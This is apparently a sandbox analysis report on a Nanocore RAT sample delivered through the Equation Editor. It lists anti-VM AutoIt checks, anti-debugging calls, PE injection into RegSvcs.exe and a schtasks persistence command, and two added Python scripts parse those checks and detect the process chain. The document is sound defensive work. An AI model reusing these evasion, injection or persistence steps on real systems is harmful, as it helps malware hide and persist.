Source: mmuiqlcvwo.pif, 0000000C.00000002.666203454.0000000000914000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenr36|
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: VBoxTray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If ProcessExists("VBoxTray.exe") ThenC
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenU[U
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then48
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: VMwaretray.exek
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If ProcessExists("VboxService.exe") Thent7n
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: VboxService.exe
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027D353 VirtualQuery,GetSystemInfo, 4_2_0027D353
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 4_2_0026A2DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 4_2_0027AFB9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00289FD3 FindFirstFileExA, 4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose, 5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100DE7C FindFirstFileW,FindClose, 5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00FFBF17
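
The memory strings above are fragments of the AutoIt script compiled into mmuiqlcvwo.pif: each `If ... Then` gates execution on VMware or VirtualBox helper processes (ProcessExists), in two cases combined with a free-space test on D: (DriveSpaceFree), and once on the text of the Program Manager window (WinGetText). The following is an added example, not part of the Joe Sandbox report: it pulls those gates out of a constructed memory blob (with the same kind of trailing junk the dump shows), and evaluates which gates a given analysis environment would trip. The blob, the sample environments and the helper names are this example's own assumptions.

```python
from __future__ import annotations

import re

# Constructed stand-in for a process memory dump (not taken from the sandbox).
# It reproduces the AutoIt conditionals recovered from mmuiqlcvwo.pif above,
# each followed by the kind of trailing junk ("ThenAq", "ThenD6", ...) that
# appears when a string is read past its terminator.
SAMPLE_DUMP = (
    b'If DriveSpaceFree("d:\\") < 1 And ProcessExists("VMwareUser.exe") ThenAq\x00'
    b'If ProcessExists("VBoxTray.exe") ThenD6\x00'
    b'If ProcessExists("VboxService.exe") ThenfMf\x00'
    b'If ProcessExists("VMwaretray.exe") Then\x00'
    b'If DriveSpaceFree("d:\\") < 1 And ProcessExists("VMwareService.exe") Thenr36|\x00'
    b'If WinGetText("Program Manager") = "0" Then\x00'
    b'\x90\x90 unrelated bytes \xff\xfe AutoIt v3\x00'
)

# One `If <cond> Then` per string; a condition never crosses a NUL or a newline.
COND_RE = re.compile(rb'\bIf\s+([^\x00\r\n]+?)\s+Then')
PROC_RE = re.compile(rb'ProcessExists\("([^"]+)"\)')
DRIVE_RE = re.compile(rb'DriveSpaceFree\("([^"]+)"\)\s*<\s*(\d+)')
WINTEXT_RE = re.compile(rb'WinGetText\("([^"]+)"\)\s*=\s*"([^"]*)"')


def _s(b: bytes) -> str:
    return b.decode("ascii", "replace")


def parse_autoit_gates(blob: bytes) -> list[dict]:
    """Return every `If ... Then` gate that fingerprints the environment.

    Each gate records the process names, the free-space test and the window
    text test it contains; conditions without any of the three are skipped.
    Drive letters are stored lower-case so callers can key free_mb the same way.
    """
    gates = []
    for m in COND_RE.finditer(blob):
        cond = m.group(1)
        gate = {"processes": [_s(p) for p in PROC_RE.findall(cond)],
                "drive": None, "window_text": None, "raw": _s(cond)}
        d = DRIVE_RE.search(cond)
        if d:
            gate["drive"] = (_s(d.group(1)).lower(), int(d.group(2)))
        w = WINTEXT_RE.search(cond)
        if w:
            gate["window_text"] = (_s(w.group(1)), _s(w.group(2)))
        if gate["processes"] or gate["drive"] or gate["window_text"]:
            gates.append(gate)
    return gates


def gate_fires(gate: dict, running: set[str], free_mb: dict[str, int],
               window_text: dict[str, str]) -> bool:
    """Evaluate one gate the way the AutoIt script would.

    The recovered conditions join their terms with `And`, so every term
    present must hold. ProcessExists() is case-insensitive. DriveSpaceFree()
    returns megabytes and 0 on failure, so a D: that does not exist, or an
    empty optical drive, satisfies `< 1`; hence the default of 0 below.
    """
    running_lc = {p.lower() for p in running}
    if any(p.lower() not in running_lc for p in gate["processes"]):
        return False
    if gate["drive"]:
        drive, limit = gate["drive"]
        if free_mb.get(drive, 0) >= limit:
            return False
    if gate["window_text"]:
        title, expected = gate["window_text"]
        if window_text.get(title) != expected:
            return False
    return True


def fired_gates(blob: bytes, running: set[str], free_mb: dict[str, int],
                window_text: dict[str, str]) -> list[str]:
    """Raw text of every gate the given environment would trip."""
    return [g["raw"] for g in parse_autoit_gates(blob)
            if gate_fires(g, running, free_mb, window_text)]


if __name__ == "__main__":
    # A stock VirtualBox guest with Guest Additions running trips two gates.
    for cond in fired_gates(SAMPLE_DUMP, {"explorer.exe", "VBoxTray.exe", "VBoxService.exe"},
                            {"c:\\": 40000}, {"Program Manager": "Recycle Bin"}):
        print("would exit on:", cond)
```

Note that in every recovered gate the process name is the decisive term: the DriveSpaceFree clause only narrows two of them, so an analysis VM that renames or stops the VMware and VirtualBox helper processes defeats all six regardless of what D: looks like.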

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress, 5_2_00FBEE30
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00286AF3 mov eax, dword ptr fs:[00000030h] 4_2_00286AF3
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0027E4F5
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0028ACA1 GetProcessHeap, 4_2_0028ACA1
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100A35D BlockInput, 5_2_0100A35D
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E643 SetUnhandledExceptionFilter, 4_2_0027E643
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0027E4F5
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0027E7FB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00287BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00287BE1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FCF170 SetUnhandledExceptionFilter, 5_2_00FCF170
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FCA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00FCA128
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00FC7CCD

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 protect: page execute and read and write
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 value starts with: 4D5A
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000
Contains functionality to simulate keystroke presses
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00FE43FF
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Contains functionality to execute programs as a different user
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE6C61 LogonUserW, 5_2_00FE6C61
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FBD7A0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 5_2_00FBD7A0
Contains functionality to simulate mouse events
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FE3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 5_2_00FE3321
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00FF602A
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp Binary or memory string: Program Manager48
Source: RegSvcs.exe, 00000006.00000002.667096389.000000000291F000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: mmuiqlcvwo.pif.4.dr Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp Binary or memory string: Program ManagerV
Source: mmuiqlcvwo.pif, 00000005.00000000.479651653.0000000001032000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000000.511159853.0000000001032000.00000002.00020000.sdmp Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp Binary or memory string: Program Manager@
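
The process chain in this section (EQNEDT32.EXE starting vbc.exe from C:\Users\Public, vbc.exe starting a .pif from a numeric folder under the user profile, the .pif starting RegSvcs.exe from %TEMP% and allocating RWX memory in it, writing a buffer that starts with 4D5A and then a second region, RegSvcs.exe registering an 'SMTP Service' task from an XML in %TEMP%, and taskeng.exe later relaunching RegSvcs.exe) maps directly onto detection rules. The following is an added example, not part of the Joe Sandbox report: it replays a constructed event stream modelled on those lines through a small rule set. The event field names, the PIDs and the reading of the 7EFDE000 write as a PEB patch are this example's assumptions; the paths and command lines are the ones the report lists.

```python
import re
from collections import defaultdict

# Constructed event stream (this example's own, not sandbox output) modelled on
# the process tree and cross-process memory operations listed in this section.
# Field names are an assumption; map them onto what your EDR or Sysmon pipeline emits.
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
PIF = r"C:\Users\user\33920049\mmuiqlcvwo.pif"
REGSVCS = r"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"

EVENTS = [
    {"type": "process_create", "pid": 4, "parent_image": EQN, "image": VBC, "cmdline": f"'{VBC}'"},
    {"type": "process_create", "pid": 5, "parent_image": VBC, "image": PIF, "cmdline": f"'{PIF}' fmkkelc.omp"},
    {"type": "process_create", "pid": 6, "parent_image": PIF, "image": REGSVCS, "cmdline": REGSVCS},
    {"type": "mem_alloc", "pid": 5, "target_pid": 6, "base": 0x340000, "protect": "PAGE_EXECUTE_READWRITE"},
    {"type": "mem_write", "pid": 5, "target_pid": 6, "base": 0x340000, "head": b"MZ\x90\x00"},
    # The report only gives the address of this write; its contents are not known.
    {"type": "mem_write", "pid": 5, "target_pid": 6, "base": 0x7EFDE000, "head": b"\x00\x00\x00\x00"},
    {"type": "process_create", "pid": 7, "parent_image": REGSVCS, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'"},
    {"type": "process_create", "pid": 9, "parent_image": r"C:\Windows\System32\taskeng.exe",
     "image": REGSVCS, "cmdline": f"{REGSVCS} 0"},
    # Benign control: Explorer starting a binary from System32 should raise nothing.
    {"type": "process_create", "pid": 20, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
PUBLIC_RE = re.compile(r"^[A-Z]:\\Users\\Public\\", re.I)
# C:\Users\<user>\<digits>\<file>: a PE dropped in a numeric folder directly under the profile
USER_ROOT_DIR_RE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\\d+\\[^\\]+$", re.I)
PE_EXTS = (".exe", ".pif", ".scr", ".com")
ODD_PE_EXTS = (".pif", ".scr", ".com")  # run as PE, but rarely legitimate for dropped files


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def process_rules(ev: dict) -> list:
    """Sigma-style checks on a single process-creation event; returns rule names."""
    img, parent, cmd = ev["image"], ev["parent_image"], ev["cmdline"].lower()
    hits = []
    if _base(parent) == "eqnedt32.exe":
        hits.append("eqnedt32_child_process")          # Equation Editor has no business spawning anything
    if img.lower().endswith(PE_EXTS) and (PUBLIC_RE.search(img) or USER_ROOT_DIR_RE.search(img) or TEMP_RE.search(img)):
        hits.append("execution_from_suspicious_folder")
    if img.lower().endswith(ODD_PE_EXTS):
        hits.append("pe_with_suspicious_extension")
    if _base(img) == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and TEMP_RE.search(cmd):
        hits.append("schtasks_xml_from_temp")          # task definition staged in %TEMP%
    if _base(parent) == "taskeng.exe" and TEMP_RE.search(img):
        hits.append("scheduled_task_runs_from_temp")   # the persistence firing
    return hits


def memory_rules(events: list) -> list:
    """Correlate cross-process allocations and writes per (source, target) pair."""
    hits, rwx = [], defaultdict(set)                   # (src, dst) -> bases allocated RWX by src
    for ev in events:
        dst = ev.get("target_pid")
        if dst is None or dst == ev["pid"]:
            continue
        key = (ev["pid"], dst)
        if ev["type"] == "mem_alloc" and "EXECUTE" in ev["protect"] and "WRITE" in ev["protect"]:
            rwx[key].add(ev["base"])
            hits.append(("rwx_allocation_in_foreign_process", dst))
        elif ev["type"] == "mem_write":
            if ev["base"] in rwx[key] and ev["head"][:2] == b"MZ":
                hits.append(("pe_injection_into_foreign_process", dst))
            elif ev["base"] not in rwx[key]:
                # A write outside anything the source allocated. Here that is 0x7EFDE000,
                # where the PEB of a 32-bit process typically sits on Windows 7; repointing
                # PEB.ImageBaseAddress at the injected image is the process-hollowing step
                # that precedes resuming the suspended child (an assumption, not in the report).
                hits.append(("write_to_foreign_memory_outside_own_allocation", dst))
    return hits


def detect(events: list) -> list:
    """All (rule, pid) pairs raised by the stream; pid is the process the rule is about."""
    alerts = [(rule, ev["pid"]) for ev in events if ev["type"] == "process_create"
              for rule in process_rules(ev)]
    return alerts + memory_rules(events)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule on its own is noisy in a large estate (developers do run .exe files from %TEMP%); what makes this chain unambiguous is the combination: an Equation Editor child, followed by a cross-process RWX allocation receiving an MZ header, followed by a scheduled task whose definition lives in %TEMP%. Correlating on the parent-child links is what turns the individual observations into a single high-confidence alert.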

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_00279D99
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027E34B cpuid 4_2_0027E34B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027CBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle, 4_2_0027CBB8
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FCE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 5_2_00FCE284
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01022BF9 GetUserNameW, 5_2_01022BF9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026A995 GetVersionExW, 4_2_0026A995

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
